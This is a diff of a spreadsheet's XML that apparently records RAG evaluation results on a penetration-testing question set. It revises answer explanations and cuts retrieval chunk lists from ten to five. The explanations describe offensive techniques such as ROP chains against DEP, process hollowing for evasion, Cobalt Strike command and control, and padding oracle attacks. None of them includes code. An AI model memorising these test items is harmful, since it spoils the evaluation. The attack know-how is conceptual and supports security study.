-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I207" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J207" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K207" t="inlineStr">
         <is>
@@ -14399,7 +13340,7 @@
       <c r="F208" t="inlineStr">
         <is>
           <t>Answer: Cross-site Request Forgery (CSRF)
-Explanation: Cross-site Request Forgery (CSRF) is the correct answer because it specifically involves an attacker tricking a victim's browser into executing unwanted actions on a web application where the victim is authenticated.</t>
+Explanation: Cross-site Request Forgery (CSRF) is the correct answer because it specifically involves an attacker tricking a victim's browser into executing unwanted actions on a web application where the victim is authenticated. This technique exploits the trust that a site has in the user's browser, allowing the attacker to submit malicious requests on behalf of the victim, potentially leading to unauthorized actions or data access.</t>
         </is>
       </c>
       <c r="G208" t="inlineStr">
@@ -14413,21 +13354,16 @@
 preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I208" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J208" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K208" t="inlineStr">
         <is>
@@ -14466,7 +13402,7 @@
       <c r="F209" t="inlineStr">
         <is>
           <t>Answer: ROP chain execution
-Explanation: ROP (Return-Oriented Programming) chain execution is employed to bypass memory protection schemes like DEP, which prevents the execution of code on traditionally non-executable memory regions like the stack. By using ROP, an attacker can execute arbitrary code by using snippets of already existing code ('gadgets') that end in a 'ret' instruction, thus building a chain of gadget executions that achieve the desired malicious activity without needing to inject new code. Heap spraying primarily aims to facilitate arbitrary code execution but is not specifically designed to bypass DEP. Buffer overflow and SQL injection are types of attacks that can be used in exploit development but do not directly address the issue of bypassing DEP.</t>
+Explanation: ROP chain execution is employed to bypass memory protection schemes like DEP, which prevents the execution of code on traditionally non-executable memory regions like the stack. By using ROP, an attacker can execute arbitrary code by using snippets of already existing code ('gadgets') that end in a 'ret' instruction, thus building a chain of gadget executions that achieve the desired malicious activity without needing to inject new code. Heap spraying primarily aims to facilitate arbitrary code execution, while buffer overflow and SQL injection are specific types of vulnerabilities rather than techniques for bypassing memory protection mechanisms.</t>
         </is>
       </c>
       <c r="G209" t="inlineStr">
@@ -14480,21 +13416,16 @@
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I209" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J209" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K209" t="inlineStr">
         <is>
@@ -14533,7 +13464,7 @@
       <c r="F210" t="inlineStr">
         <is>
           <t>Answer: Exploiting known vulnerabilities in outdated server software versions
-Explanation: The key aspect of effective penetration testing is to exploit the weakest link in a system's security. In this scenario, the target system runs an outdated version of the Apache web server. Historical data and security reports such as those from CVE (Common Vulnerabilities and Exposures) detail numerous vulnerabilities in specific old versions of Apache, such as remote code execution and privilege escalation, which can be exploited. With the server running version 2.2.31, specific exploits targeted to this version can be leveraged heavily to gain unauthorized access or escalate privileges. Distractors like analyzing denial of service vulnerability through traffic flooding, carrying out a SQL Injection attack, and conducting a brute-force attack do not specifically cater to the discovered weakness (i.e., the outdated server version) and might require more time and resources to succeed. Analyzing the application's resistance to traffic flooding also may be valid but isn't directly exploiting the known vulnerability of the old Apache version, making it a less direct approach for penetration.</t>
+Explanation: The key aspect of effective penetration testing is to exploit the weakest link in a system's security. In this scenario, the target system runs an outdated version of the Apache web server. Historical data and security reports such as those from CVE (Common Vulnerabilities and Exposures) detail numerous vulnerabilities in specific old versions of Apache, such as remote code execution and privilege escalation, which can be exploited. With the server running version 2.2.31, specific exploits targeted to this version can be leveraged heavily to gain unauthorized access or escalate privileges. Distractors like SQL Injection or brute-force attacks, while valid techniques, do not specifically cater to the discovered weakness (i.e., the outdated server version) and might require more time and resources to succeed. Analyzing the application's resistance to traffic flooding (denial of service) also may be valid but isn't directly exploiting the known vulnerability of the old Apache version, making it a less direct approach for penetration.</t>
         </is>
       </c>
       <c r="G210" t="inlineStr">
@@ -14547,21 +13478,16 @@
 preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I210" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J210" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K210" t="inlineStr">
         <is>
@@ -14600,7 +13526,7 @@
       <c r="F211" t="inlineStr">
         <is>
           <t>Answer: Cobalt Strike
-Explanation: Cobalt Strike is a powerful post-exploitation framework that facilitates long-term access and provides comprehensive command and control capabilities. It includes features like beaconing capabilities, which allow stealthy communication with compromised hosts, and a suite of tools for network reconnaissance, lateral movement, and data exfiltration. While Meterpreter and Pupy are also post-exploitation frameworks, they are not as comprehensive or feature-rich as Cobalt Strike. Empire is another option but it's more focused on providing a scriptable command and control framework rather than the full suite of features provided by Cobalt Strike.</t>
+Explanation: Cobalt Strike is a powerful post-exploitation framework that experienced attackers can use to facilitate long-term access and provide comprehensive command and control capabilities. It includes features like beaconing for stealthy communication with compromised hosts, network reconnaissance tools, lateral movement capabilities, and data exfiltration utilities. While Meterpreter and Pupy are also post-exploitation frameworks, they may not offer the same level of comprehensive command and control as Cobalt Strike. Empire is a versatile tool but is more focused on providing a scriptable interface for various tasks rather than being a complete post-exploitation framework with long-term access capabilities.</t>
         </is>
       </c>
       <c r="G211" t="inlineStr">
@@ -14614,21 +13540,16 @@
 preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I211" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J211" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K211" t="inlineStr">
         <is>
@@ -14667,7 +13588,7 @@
       <c r="F212" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the software with random data inputs
-Explanation: Fuzzing the software with random data inputs is the most effective technique for discovering potential buffer overflows. This method involves sending large amounts of random data to an application in order to trigger a crash. If a crash occurs, it often indicates the existence of memory corruption vulnerabilities such as buffer overflows, which can then potentially be exploited. Scanning the network for open ports and using social engineering tactics are unrelated to the technical discovery of software vulnerabilities like buffer overflows. Conducting a static code analysis is useful for finding security flaws like hard-coded credentials or insecure configurations, but it is less effective for dynamically identifying runtime vulnerabilities like buffer overflows.</t>
+Explanation: Fuzzing the software with random data inputs is the most effective technique for discovering potential buffer overflows. This method involves sending large amounts of random data to an application in order to trigger a crash. If a crash occurs, it often indicates the existence of memory corruption vulnerabilities such as buffer overflows, which can then potentially be exploited. Scanning the network for open ports and conducting a static code analysis are useful techniques but do not specifically target buffer overflow discovery. Using social engineering tactics is unrelated to the technical discovery of software vulnerabilities like buffer overflows.</t>
         </is>
       </c>
       <c r="G212" t="inlineStr">
@@ -14681,21 +13602,16 @@
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I212" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J212" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K212" t="inlineStr">
         <is>
@@ -14734,7 +13650,7 @@
       <c r="F213" t="inlineStr">
         <is>
           <t>Answer: Process Hollowing
-Explanation: Process Hollowing is a stealth technique used by malware developers that involves creating a process in a suspended state and then replacing its image with the malicious code before resuming it. This method is effective at evading detection because it appears as a legitimate and benign process to the system's monitoring tools. 'Reflective DLL Injection' deals with injecting a DLL from memory</t>
+Explanation: Process Hollowing is a stealth technique used by malware developers that involves creating a process in a suspended state and then replacing its image with the malicious code before resuming it. This method is effective at evading detection because it appears as a legitimate and benign process to the system's monitoring tools. 'Reflective DLL Injection' deals with injecting a DLL from memory, while 'Process Doppelgänging' and 'Thread Local Storage Callbacks' are not commonly used techniques for executing arbitrary code in the memory space of a separate live process.</t>
         </is>
       </c>
       <c r="G213" t="inlineStr">
@@ -14748,21 +13664,16 @@
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: 924a5cff-3664-4ddd-8d4f-df8b9ec7e730, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: fca5c541-a4a4-43b8-8b26-388e9cea155b, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: sparse, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: 924a5cff-3664-4ddd-8d4f-df8b9ec7e730, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I213" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J213" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K213" t="inlineStr">
         <is>
@@ -14801,7 +13712,7 @@
       <c r="F214" t="inlineStr">
         <is>
           <t>Answer: Metasploit's msfconsole
-Explanation: Metasploit's msfconsole is specifically designed for automating the exploitation of known vulnerabilities in remote servers and applications. It provides a comprehensive framework that includes payloads, encoders, and exploit modules which can be used to efficiently target and test the security of remote systems. On the other hand, Wireshark's protocol analyzer is primarily used for network protocol analysis, making it not directly related to the subtlety required for maintaining long-term persistence, and John the Ripper password cracker is a tool for brute force or dictionary attacks on weak passwords, while Burp Suite's proxy tool is predominantly utilized for web application security testing.</t>
+Explanation: Metasploit's msfconsole is specifically designed for automating the exploitation of known vulnerabilities in remote servers and applications. It provides a comprehensive framework that includes payloads, encoders, and exploit modules which can be used to efficiently target and test the security of remote systems. On the other hand, Wireshark's protocol analyzer is primarily used for network protocol analysis, making it not directly related to the subtlety required for maintaining long-term persistence, and John the Ripper password cracker is more focused on brute force or dictionary attacks rather than exploiting known vulnerabilities. Burp Suite's proxy tool is predominantly utilized for web application security testing, not for automating the exploitation of known vulnerabilities in remote systems.</t>
         </is>
       </c>
       <c r="G214" t="inlineStr">
@@ -14815,21 +13726,16 @@
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 1d9c2c29-6258-4807-8e78-b88b13c24f33, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f31cfefc-9fab-4a23-aa84-53a64623ddac, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I214" t="inlineStr">
         <is>
-          <t>Semantic: 4, Keyword: 6, Total: 10</t>
+          <t>Semantic: 2, Keyword: 3, Total: 5</t>
         </is>
       </c>
       <c r="J214" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K214" t="inlineStr">
         <is>
@@ -14868,7 +13774,7 @@
       <c r="F215" t="inlineStr">
         <is>
           <t>Answer: Address Space Layout Randomization (ASLR) bypass
-Explanation: Address Space Layout Randomization (ASLR) is a memory-protection process for operating systems that guards against buffer overflow attacks by randomly positioning the address space positions of key data areas of processes, including the base of the executable and the positions of the stack, heap, and libraries. The 'ASLR bypass' techniques are specifically designed to overcome this defense by finding ways to predict or infer the randomized locations of these areas or otherwise mitigate the randomization.</t>
+Explanation: Address Space Layout Randomization (ASLR) is a memory-protection process for operating systems that guards against buffer overflow attacks by randomly positioning the address space positions of key data areas of processes, which include the base of the executable and the positions of the stack, heap, and libraries. The 'ASLR bypass' techniques are specifically designed to overcome this defense by finding ways to predict or infer the randomized locations of these areas or otherwise mitigate the randomization.</t>
         </is>
       </c>
       <c r="G215" t="inlineStr">
@@ -14882,21 +13788,16 @@
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I215" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J215" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K215" t="inlineStr">
         <is>
@@ -14935,7 +13836,7 @@
       <c r="F216" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the software to find potential memory corruption vulnerabilities
-Explanation: Fuzzing the software is the most effective initial approach for identifying exploitable vulnerabilities in a proprietary communication protocol. This technique involves sending large amounts of random or unexpected data as inputs to the program, which can trigger unusual responses and potentially reveal security flaws such as buffer overflows, injection attacks, and handling of exceptional conditions. Fuzzing does not require access to the source code and can efficiently explore all execution paths to uncover runtime-specific vulnerabilities that are often found in communication protocols. Static code analysis requires access to the source code and may not efficiently explore all execution paths to uncover runtime-specific vulnerabilities. Deploying a web application firewall is irrelevant in this context as it is more about prevention and mitigation in production environments rather than identifying vulnerabilities during development. Running an automated vulnerability scanner can be useful for initial reconnaissance but lacks the depth needed for exploit development specific to ASLR and DEP.</t>
+Explanation: Fuzzing the software to find potential memory corruption vulnerabilities is the most effective initial approach when identifying exploitable vulnerabilities in a proprietary communication protocol. This technique involves sending unexpected or malformed data to the software, causing it to crash or behave unpredictably. Memory corruption vulnerabilities, such as buffer overflows and integer overflows, can be identified through fuzzing, which are often exploited by attackers to gain unauthorized access or execute arbitrary code. While conducting a static code analysis, deploying a web application firewall, and running an automated vulnerability scanner can also help identify vulnerabilities, fuzzing is the most effective initial approach for exploit development specific to ASLR and DEP.</t>
         </is>
       </c>
       <c r="G216" t="inlineStr">
@@ -14945,25 +13846,20 @@
       </c>
       <c r="H216" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: sparse, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I216" t="inlineStr">
         <is>
-          <t>Semantic: 2, Keyword: 8, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J216" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K216" t="inlineStr">
         <is>
@@ -15002,7 +13898,7 @@
       <c r="F217" t="inlineStr">
         <is>
           <t>Answer: Padding oracle attack
-Explanation: The padding oracle attack is the most effective technique to exploit weaknesses in the handling of encryption padding in a web application using AES in CBC mode. This attack specifically targets vulnerabilities related to how errors are handled during decryption in CBC mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The other options do not directly exploit padding handling: bit flipping primarily involves manipulating encrypted data to alter the plaintext, replay attacks involve retransmitting valid data to perform unauthorized actions, and man-in-the-middle attacks intercept and possibly alter communications between two parties without their knowledge.</t>
+Explanation: The padding oracle attack is the correct choice because it specifically exploits vulnerabilities related to how padding is checked and managed during decryption in cipher block chaining (CBC) mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The bit flipping attack, although relevant to CBC mode, primarily involves manipulating encrypted data to alter the plaintext, rather than exploiting padding directly. A replay attack involves retransmitting valid data to perform unauthorized actions, and a man-in-the-middle attack involves intercepting and possibly altering communications between two parties; neither focus specifically on shortcomings in encryption padding handling, making them less suitable choices for this scenario.</t>
         </is>
       </c>
       <c r="G217" t="inlineStr">
@@ -15016,21 +13912,16 @@
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I217" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J217" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K217" t="inlineStr">
         <is>
@@ -15069,7 +13960,7 @@
       <c r="F218" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application to trigger unusual responses
-Explanation: Fuzzing the application to trigger unusual responses is the most effective initial technique to identify security vulnerabilities specifically in an API during a red-team engagement. Fuzzing involves sending a wide range of inputs to the API in order to test how it handles unexpected or malformed data, potentially revealing security flaws such as buffer overflows, injection attacks, and handling of exceptional conditions. Scanning the network for open ports, while useful in broader security assessments, is less targeted for API vulnerabilities. Passive DNS monitoring is generally used for detecting malicious domain resolutions, which</t>
+Explanation: Fuzzing the application to trigger unusual responses is the most effective initial technique to identify security vulnerabilities in an API during a red-team engagement. Fuzzing involves sending a wide range of inputs to the API in order to test how it handles unexpected or malformed data, potentially revealing security flaws such as buffer overflows, injection attacks, and handling of exceptional conditions. Scanning the network for open ports, while useful in broader security assessments, is less targeted for API vulnerabilities. Passive DNS monitoring is generally used for detecting malicious domain resolutions, which is not directly related to identifying API vulnerabilities.</t>
         </is>
       </c>
       <c r="G218" t="inlineStr">
@@ -15083,21 +13974,16 @@
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
